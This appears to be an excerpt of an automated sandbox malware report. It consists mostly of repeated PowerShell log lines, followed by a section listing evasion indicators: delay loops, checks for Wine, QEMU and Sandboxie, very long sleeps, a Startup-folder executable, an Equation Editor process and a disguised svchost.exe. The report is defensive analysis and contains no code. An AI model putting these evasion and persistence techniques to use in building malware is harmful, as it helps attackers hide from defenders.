Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to delay execution (extensive OutputDebugStringW loop)Show sources
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeSection loaded: OutputDebugStringW count: 112
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeSection loaded: OutputDebugStringW count: 212
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: CTF loader_es.exe, 00000004.00000002.2177240718.00000000007F0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -180000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2396Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2392Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe TID: 2652Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2372Thread sleep count: 88 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 856Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe TID: 2488Thread sleep count: 85 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1772Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2532Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeLast function: Thread delayed
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_01DB096A GetSystemInfo,
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeThread delayed: delay time: 922337203685477
